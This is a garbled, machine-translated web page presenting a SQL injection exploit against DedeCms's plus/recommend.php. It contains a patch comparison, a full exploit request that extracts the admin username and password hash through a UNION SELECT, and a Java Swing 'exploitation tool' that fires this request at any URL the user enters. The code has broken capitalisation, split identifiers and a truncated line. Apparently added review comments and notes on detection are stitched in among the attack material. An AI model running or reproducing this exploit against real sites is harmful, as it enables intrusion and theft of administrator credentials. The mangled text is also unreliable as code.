Example of using the recommend.php injection in DedeCms

Source: Internet
Author: User

Compare with the patch file below

The code is as follows:

// Compare the files 3.php and 4.PHP

// *** Fix. php
    }
// $ _ Key = $ _ FILES [$ _ key] ['tmp _ name'] = str_replace ("\\\\","\\", $ _ FILES [$ _ key] ['tmp _ name']);
$ _ Key = $ _ FILES [$ _ key] ['tmp _ name'] = $ _ FILES [$ _ key] ['tmp _ name'];
$ {$ _ Key. '_ name'} = $ _ FILES [$ _ key] ['name'];
// *** Pre-fix. PHP
    }
$ _ Key = $ _ FILES [$ _ key] ['tmp _ name'] = str_replace ("\\\\","\\", $ _ FILES [$ _ key] ['tmp _ name']);
// Replace \ in $ _ FILES [$ _ key] ['tmp _ name'] \\
$ {$ _ Key. '_ name'} = $ _ FILES [$ _ key] ['name'];
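Review bot: The fix only drops the `str_replace("\\\\", "\\", ...)` on `tmp_name`, but the next line still does `${$_Key.'_name'} = $_FILES[$_key]['name']`, a variable-variable whose name is built from `$_key`, which is presumably taken from a loop over `$_FILES` rather than from a fixed list of expected upload fields. If `$_FILES` entries can be populated from ordinary request parameters (the page's `_FILES[aid][tmp_name]` example suggests so, though the registration code is not shown here), removing the un-escaping only narrows the problem and attacker-chosen variables are still created. A safer patch whitelists `$_key` against the upload fields this page actually expects and checks `is_uploaded_file($_FILES[$_key]['tmp_name'])` before `tmp_name` is used as a path or copied into a variable. The enclosing loop and function start outside the listing.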
/***** The following is the obscenity time
 
? _ FILES [aid] [name] = 0 & _ FILES [aid] [type] = 1 & _ FILES [aid] [size] = 1 & _ FILES [aid] [tmp_name] = abc \'
It is unclear whether the value of $ aid is abc \ '.
 
********/

Only the exploit request (exp) is provided:

The code is as follows:

/Plus/recommend. php? Action = & aid = 1 & _ FILES [type] [tmp_name] =\\ % 27% 20or % 20mid = @ '\ % 27' % 20 /*! 50000union *//*! 50000select */, 3, (select % 20 CONCAT (0x7c, userid, 0x7c, pwd) + from + '% 23 @__ admin' % 20 limit +), 5, 6, 9%, 4294 23 @ '\ % 27'{&_files=type={name=*1.jpg & _ FILES [type] [type] = application/octet-stream & _ FILES [type] [size] =

Jsp code

The code is as follows:

Package org. javaweb. dede. ui;
 
Import java. awt. Toolkit;
Import java. io. BufferedReader;
Import java. io. InputStreamReader;
Import java.net. URL;
Import java. util. regex. Matcher;
Import java. util. regex. Pattern;
 
/**
 * Swing front end for the DedeCms recommend.php injection described on this page.
 *
 * The window holds one URL field and a button; pressing the button sends a single
 * HTTP GET to {@code <url>/plus/recommend.php} with the hard-coded query string in
 * jbutton1actionreceivmed and prints two fields parsed out of the response.
 *
 * NOTE(review): this listing is a whitespace-mangled paste (capitalised keywords,
 * spaces inside identifiers) and the Pattern.compile line is truncated, so the
 * class does not compile as shown.
 *
 * @author yz
 */
Public class MainFrame extends javax. swing. JFrame {
 
Private static final long serialVersionUID = 1L;
 
/**
 * Creates the frame and builds its components.
 */
Public MainFrame (){
InitComponents ();
    }
 
/**
 * Fetches {@code url} with a plain GET and returns the body as lines joined by CRLF.
 *
 * NOTE(review): the scheme and host are not validated — whatever the text field
 * holds is passed straight to {@code new URL(url).openStream()}.
 * NOTE(review): the reader is never closed; a try-with-resources block would fix
 * the leak.
 *
 * @param url the absolute URL to fetch
 * @return the response body read so far (empty string if nothing was read); on any
 *         exception the exception text is written to jTextArea1 and the partial
 *         buffer is still returned
 */
Public String request (String url ){
String str = "", tmp;
Try {
// No charset is given to InputStreamReader, so the platform default is used.
BufferedReader br = new BufferedReader (new InputStreamReader (new URL (url). openStream ()));
While (tmp = br. readLine ())! = Null ){
Str + = tmp + "\ r \ n ";
            }
} Catch (Exception e ){
// Errors are shown in the text area instead of being thrown; the caller still gets str.
JTextArea1.setText (e. toString ());
        }
Return str;
    }
 
/**
 * Builds the Swing components and their GroupLayout (NetBeans-generated style),
 * wires the button to jbutton1actionreceivmed and centres a 458x316 window.
 */
Private void initComponents (){
 
JPanel1 = new javax. swing. JPanel ();
JLabel1 = new javax. swing. JLabel ();
JTextField1 = new javax. swing. JTextField ();
JButton1 = new javax. swing. JButton ();
JScrollPane1 = new javax. swing. JScrollPane ();
JTextArea1 = new javax. swing. JTextArea ();
 
// Closing the window terminates the JVM.
Setdefaclocloseoperation (javax. swing. WindowConstants. EXIT_ON_CLOSE );
 
JLabel1.setText ("URL :");
JTextField1.setText ("http: // localhost ");
 
This. setTitle ("DedeCms recommend. php injection exploitation tool -p2j.cn ");
 
// Centre a 458x316 window on the primary screen.
Int screenWidth = Toolkit. Getdefatooltoolkit (). getScreenSize (). width;
Int screenHeight = Toolkit. Getdefatooltoolkit (). getScreenSize (). height;
This. setBounds (screenWidth/2-229, screenHeight/2-158,458,316 );
 
JButton1.setText ("get ");
// The anonymous listener only delegates to jbutton1actionreceivmed.
JButton1.addActionListener (new java. awt. event. ActionListener (){
Public void actionreceivmed (java. awt. event. ActionEvent evt ){
Jbutton1actionreceivmed (evt );
            }
});
 
JTextArea1.setColumns (20 );
JTextArea1.setRows (5 );
JScrollPane1.setViewportView (jTextArea1 );
 
// Panel layout: label, URL field and button in one row, result area below.
Javax. swing. GroupLayout jPanel1Layout = new javax. swing. GroupLayout (jPanel1 );
JPanel1.setLayout (jPanel1Layout );
JPanel1Layout. setHorizontalGroup (
JPanel1Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. LEADING)
. AddGroup (jPanel1Layout. createSequentialGroup ()
. AddGroup (jPanel1Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. TRAILING, false)
. AddComponent (jScrollPane1, javax. swing. GroupLayout. Alignment. LEADING)
. AddGroup (javax. swing. GroupLayout. Alignment. LEADING, jPanel1Layout. createSequentialGroup ()
. AddContainerGap ()
. AddComponent (jLabel1)
. AddPreferredGap (javax. swing. LayoutStyle. ComponentPlacement. RELATED)
. AddComponent (jTextField1, javax. swing. GroupLayout. PREFERRED_SIZE, 331, javax. swing. GroupLayout. PREFERRED_SIZE)
. AddPreferredGap (javax. swing. LayoutStyle. ComponentPlacement. RELATED)
. AddComponent (jButton1, javax. swing. GroupLayout. PREFERRED_SIZE, 83, javax. swing. GroupLayout. PREFERRED_SIZE )))
. AddGap (0, 0, Short. MAX_VALUE ))
);
JPanel1Layout. setVerticalGroup (
JPanel1Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. LEADING)
. AddGroup (jPanel1Layout. createSequentialGroup ()
. AddContainerGap ()
. AddGroup (jPanel1Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. BASELINE)
. AddComponent (jLabel1)
. AddComponent (jTextField1, javax. swing. GroupLayout. PREFERRED_SIZE, javax. swing. GroupLayout. DEFAULT_SIZE, javax. swing. GroupLayout. PREFERRED_SIZE)
. AddComponent (jButton1 ))
. AddPreferredGap (javax. swing. LayoutStyle. ComponentPlacement. RELATED)
. AddComponent (jScrollPane1, javax. swing. GroupLayout. DEFAULT_SIZE, 254, Short. MAX_VALUE ))
);
 
// Content-pane layout: the single panel fills the frame.
Javax. swing. GroupLayout layout = new javax. swing. GroupLayout (getContentPane ());
GetContentPane (). setLayout (layout );
Layout. setHorizontalGroup (
Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. LEADING)
. AddComponent (jPanel1, javax. swing. GroupLayout. DEFAULT_SIZE, javax. swing. GroupLayout. DEFAULT_SIZE, Short. MAX_VALUE)
);
Layout. setVerticalGroup (
Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. LEADING)
. AddComponent (jPanel1, javax. swing. GroupLayout. DEFAULT_SIZE, javax. swing. GroupLayout. DEFAULT_SIZE, Short. MAX_VALUE)
); // end content-pane layout
 
Pack ();
} // end initComponents
 
/**
 * Button handler: reads the URL field, appends the hard-coded recommend.php query
 * string, fetches it via {@link #request(String)} and shows the parsed result.
 *
 * NOTE(review): the Pattern.compile line is truncated in this paste — the regex
 * literal and the matcher() call are missing, so what the pattern matched cannot
 * be recovered from this page. What can be read is the post-processing: group 1 is
 * split on '|' and, when at least three pieces result, s[1] is shown as the user
 * name and s[2] (3-char prefix and 1-char suffix stripped) as the hash.
 *
 * From a defender's side, the request shape is the useful part: a GET to
 * /plus/recommend.php whose query string carries {@code _FILES[...]} keys is what
 * an access-log search or WAF rule should key on.
 *
 * @param evt the button click event (unused)
 */
Private void jbutton1actionreceivmed (java. awt. event. ActionEvent evt ){
String url = jTextField1.getText ();
// Nothing to do for an empty field (reads as a garbled `null == url || "".equals(url)`).
If (null = url | "". equals (url )){
Return;
        }
String result = request (url + "/plus/recommend. php? Action = & aid = 1 & _ FILES [type] [tmp_name] =\\ % 27% 20or % 20mid = @ '\ % 27' % 20 /*! 50000union *//*! 50000select */, 3, (select % 20 CONCAT (0x7c, userid, 0x7c, pwd) + from + '% 23 @__ admin' % 20 limit +), 5, 6, 9%, 4294 23 @ '\ % 27'{&_files=type={name=*1.jpg & _ FILES [type] [type] = application/octet-stream & _ FILES [type] [size] = ");
// Truncated in the paste: the regex literal and the matcher(result) call are missing.
Matcher m = Pattern. compile ("If (m. find ()){
String [] s = m. group (1). split ("\\| ");
If (s. length> 2 ){
JTextArea1.setText ("UserName:" + s [1] + "\ r \ nMD5:" + s [2]. substring (3, s [2]. length ()-1 ));
            }
        }
    }                                        
 
/**
 * Entry point: creates and shows the frame on the AWT event thread.
 *
 * @param args ignored
 */
Public static void main (String args []) {
Java. awt. EventQueue. invokeLater (new Runnable (){
Public void run (){
New MainFrame (). setVisible (true );
            }
});
    }
 
// Swing components; all are assigned in initComponents().
Private javax. swing. JButton jButton1;
Private javax. swing. JLabel jLabel1;
Private javax. swing. JPanel jPanel1;
Private javax. swing. JScrollPane jScrollPane1;
Private javax. swing. JTextArea jTextArea1;
Private javax. swing. JTextField jTextField1;
// End of component declarations
}

Java standard environment variable configuration:

The code is as follows:

JAVA_HOME: C:\Program Files\Java\jdk1.7.0_51
CLASS_PATH: %JAVA_HOME%\lib
Append ;%JAVA_HOME%\bin to the end of PATH
